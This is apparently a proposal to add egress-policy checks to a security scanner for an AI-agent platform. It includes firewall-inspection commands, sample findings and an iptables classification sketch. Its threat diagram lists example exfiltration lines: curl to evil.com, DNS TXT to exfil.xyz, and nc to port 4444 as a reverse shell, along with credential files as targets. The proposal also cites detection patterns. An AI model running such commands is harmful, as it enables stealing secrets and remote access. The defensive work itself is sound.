Add network egress policy scanner (CHK-NET-009..011) #8

@MikeeBuilds

Summary

The forensic analysis documents multiple attacks that rely on silent outbound network connections from skills and agents -- including the "What Would Elon Do?" skill that exfiltrated data to an external server, and the Moltbook skill that encoded stolen SSH keys in DNS queries.

Currently, scan_network.sh focuses entirely on inbound exposure (listening ports, firewall status). It has zero checks for outbound/egress policy.

The Exfiltration Problem

┌─────────────────────────────────────────────────────────────┐
│                    Host Machine                              │
│                                                             │
│  ┌──────────┐    ┌──────────┐    ┌──────────────────────┐  │
│  │ OpenClaw │    │ Malicious│    │  No egress policy!   │  │
│  │ Gateway  │───▶│  Skill   │───▶│                      │  │
│  └──────────┘    └────┬─────┘    │  curl evil.com/steal │──┼──▶ Attacker C2
│                       │          │  dns TXT exfil.xyz   │──┼──▶ DNS exfil
│                       │          │  nc 1.2.3.4 4444     │──┼──▶ Reverse shell
│                       ▼          └──────────────────────┘  │
│               ~/.ssh/id_rsa                                 │
│               ~/.openclaw/.env                              │
│               ~/Library/Keychains                           │
└─────────────────────────────────────────────────────────────┘

Proposed Checks

CHK-NET-009: No outbound egress restriction configured (WARN)

Check whether any egress filtering is in place:

macOS:

# Check pf (packet filter) for outbound rules
pfctl -sr 2>/dev/null | grep -E "block.*out|pass.*out.*to"

# Check Little Snitch or Lulu (common macOS outbound firewalls)
ls /Library/Extensions/LittleSnitch* 2>/dev/null
ls /Applications/LuLu.app 2>/dev/null

Linux:

# iptables OUTPUT chain
iptables -L OUTPUT -n 2>/dev/null | grep -v "^Chain\|^target\|^$"

# nftables output chain
nft list chain inet filter output 2>/dev/null

# Docker network policies
docker network inspect bridge 2>/dev/null | jq '.[0].Options'

Finding example:

{
  "id": "CHK-NET-009",
  "severity": "warn",
  "title": "No outbound network egress restrictions detected",
  "description": "No firewall rules restricting outbound connections were found. Skills and agents can make arbitrary network connections to any destination, enabling silent data exfiltration.",
  "evidence": "pf: no outbound rules, iptables OUTPUT: ACCEPT (default), no Little Snitch/LuLu detected",
  "remediation": "Configure outbound egress rules. On macOS, install LuLu (free) or Little Snitch. On Linux, add iptables OUTPUT rules to restrict skill network access."
}

CHK-NET-010: Skills sandbox allows unrestricted DNS (WARN)

DNS-based exfiltration is used by sophisticated malware (documented in the Moltbook breach). Check if DNS resolution is unrestricted:

# Check openclaw.json for sandbox.dnsPolicy
cfg '.sandbox.dnsPolicy'  # should be "restricted" or contain an allowlist

CHK-NET-011: OpenClaw config allows unrestricted outbound from skills (CRITICAL)

Check openclaw.json for skill network policies:

# Check if skills have network restrictions
cfg '.skills.networkPolicy'         # should be "deny" or "allowlist"
cfg '.skills.allowedDomains'        # should be a non-empty array
cfg '.sandbox.networkAccess'        # should be "restricted"

When skills.networkPolicy is missing or "allow" and no allowedDomains list exists:

{
  "id": "CHK-NET-011",
  "severity": "critical",
  "title": "Skills have unrestricted outbound network access",
  "description": "No network policy restricts outbound connections from skills. A malicious skill can exfiltrate data to any external server without detection.",
  "evidence": "skills.networkPolicy=<not set>, skills.allowedDomains=<not set>, sandbox.networkAccess=<not set>",
  "remediation": "Set skills.networkPolicy to 'deny' or 'allowlist' and specify skills.allowedDomains with only required endpoints.",
  "auto_fix": "jq '.skills.networkPolicy = \"deny\"' config.json > config.json.tmp && mv config.json.tmp config.json"
}

Implementation Notes

  • Extend scripts/scan_network.sh with three new functions
  • Reuse existing check_firewall_active() output to avoid duplicate work
  • The egress checks complement the existing inbound checks

References

  • Forensic analysis: "Silent curl exfiltration", "DNS-based data exfiltration" in Moltbook
  • Cisco Skill Scanner: "What Would Elon Do?" skill silent network calls
  • malicious-patterns.json PAT-014: dns.resolve.*TXT|dgram.*send
  • malicious-patterns.json PAT-015: require('https').get(
  • OWASP ASI02: Tool Misuse
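
One way the Linux half of CHK-NET-009 could decide its verdict, as an added sketch that is not code from scan_network.sh. It reads `iptables -S OUTPUT` rather than `iptables -L`, because the grep shown above drops the `Chain OUTPUT (policy ...)` line and a default-DROP chain with no rules would then look identical to an open one. The function names, verdict strings and sample rule sets are assumptions made for this example.

```shell
#!/bin/sh
# Added example. Function names and verdict strings are hypothetical,
# not part of scan_network.sh. Input: `iptables -S OUTPUT` text on stdin.
classify_output_chain() {
    awk '
        $1 == "-P" && $2 == "OUTPUT" { policy = $3 }
        $1 == "-A" && $2 == "OUTPUT" {
            # Count rules whose target drops or rejects traffic.
            for (i = 3; i < NF; i++)
                if ($i == "-j" && ($(i + 1) == "DROP" || $(i + 1) == "REJECT"))
                    blocks++
        }
        END {
            if (policy == "")            print "unknown"       # no data: not root, no iptables
            else if (policy != "ACCEPT") print "default-deny"  # chain policy is DROP
            else if (blocks > 0)         print "filtered"      # ACCEPT policy plus block rules
            else                         print "open"          # nothing restricts egress
        }'
}

# Returns 1 and prints a warn line only when the chain is provably open.
chk_net_009_linux() {
    verdict=$(classify_output_chain)
    if [ "$verdict" = "open" ]; then
        echo "CHK-NET-009 warn: iptables OUTPUT policy ACCEPT, no DROP/REJECT rules"
        return 1
    fi
    return 0
}

# Constructed sample outputs of `iptables -S OUTPUT` (not captured from a real host).
SAMPLE_OPEN='-P OUTPUT ACCEPT'
SAMPLE_ALLOW_ONLY='-P OUTPUT ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT'
SAMPLE_FILTERED='-P OUTPUT ACCEPT
-A OUTPUT -p udp -m udp --dport 53 -j REJECT --reject-with icmp-port-unreachable'
SAMPLE_DEFAULT_DENY='-P OUTPUT DROP
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -d 203.0.113.10/32 -p tcp -m tcp --dport 443 -j ACCEPT'

for s in "$SAMPLE_OPEN" "$SAMPLE_ALLOW_ONLY" "$SAMPLE_FILTERED" "$SAMPLE_DEFAULT_DENY"; do
    printf '%s\n' "$s" | classify_output_chain
done
# On a host: iptables -S OUTPUT 2>/dev/null | chk_net_009_linux
```

An `unknown` verdict (empty input, for example when the scanner is not running as root) is deliberately not reported as a finding, so a permissions failure is not mistaken for an open chain.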